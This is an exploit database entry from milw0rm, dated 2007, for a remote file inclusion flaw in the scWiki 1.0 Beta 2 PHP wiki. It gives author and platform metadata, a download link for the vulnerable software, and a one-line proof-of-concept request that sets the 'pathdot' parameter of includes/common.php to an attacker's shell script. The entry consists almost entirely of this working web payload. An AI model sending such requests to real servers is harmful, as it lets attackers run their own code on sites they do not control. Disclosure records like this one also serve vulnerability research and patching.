scWiki 1.0 Beta 2 - 'common.php?pathdot' Remote File Inclusion

EDB-ID:

4604


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-11-03


scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwiki_beta2.zip
POC :
    /includes/common.php?pathdot=Shell

# milw0rm.com [2007-11-03]